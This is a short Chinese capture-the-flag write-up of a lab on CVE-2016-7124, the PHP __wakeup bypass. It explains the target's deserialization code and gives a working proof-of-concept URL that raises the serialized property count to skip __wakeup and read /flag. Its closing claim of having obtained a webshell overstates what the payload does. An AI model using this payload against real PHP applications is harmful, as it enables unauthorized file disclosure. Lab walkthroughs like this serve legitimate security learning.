春秋云境CVE-2016-7124

1.阅读靶场信息

这里我们可以得到的信息就是序列化

沿着这个方向我们开启靶场吧

2.开启靶场

靶场如上图所示

代码功能分析

  1. 第一行highlight_file("/var/www/html/index.php") - 显示当前文件的源代码

  2. xiaorang类

    • 有一个公共属性 $file

    • __destruct():对象销毁时执行,读取并输出 $file 指定的文件

    • __wakeup():反序列化时自动执行,将 $file 强制设为 /var/www/html/index.php

  3. 最后部分

    • 检查GET参数 file 是否存在

    • 如果存在,直接对 file 参数值进行反序列化

3.poc利用

这里博主用的url就是

https://eci-2ze12sufspgrpapt2i5d.cloudeci1.ichunqiu.com:80/?file=O:8:%22xiaorang%22:2:{s:4:%22file%22;s:5:%22/flag%22;}

各位彦祖们可以参考参考

到这里相信各位彦祖们已经成功webshell了

希望大家喜欢,感谢你的观看

相关推荐
安全小白wula3 小时前
RCE远程代码/命令执行基础讲解
网络·网络安全·渗透测试·rce·web渗透
woniu_buhui_fei4 小时前
常见的网络攻击
web安全
Whoami!7 小时前
01-【医院】双网隔离架构方案
网络安全·拓扑图·信息安全架构
WangX-西石油7 小时前
DVWA靶场Low级别Brute Force学习
学习·web安全·网络安全
quan_泉7 小时前
DIDCTF 2024平航杯-流量分析
网络安全
小熊officer7 小时前
网络渗透(Network Penetration)
网络·安全·web安全
安当加密8 小时前
Cisco SD-WAN CVSS 10分零日在野利用:网络边界设备认证失效的完整复盘
网络安全·pam·radius·多因素认证·漏洞复盘
Dreamboat¿8 小时前
Web 框架识别全攻略(含 Spring Boot、Django、Laravel 等)
web安全
大方子9 小时前
【PolarCTF】投喂
网络安全·polarctf
安当加密03019 小时前
等保2.0三级数据库加密:2026检查清单 + TDE部署实战(附脚本)
数据库·网络安全·数据安全·tde·等保2.0·数据库加密·tde透明加密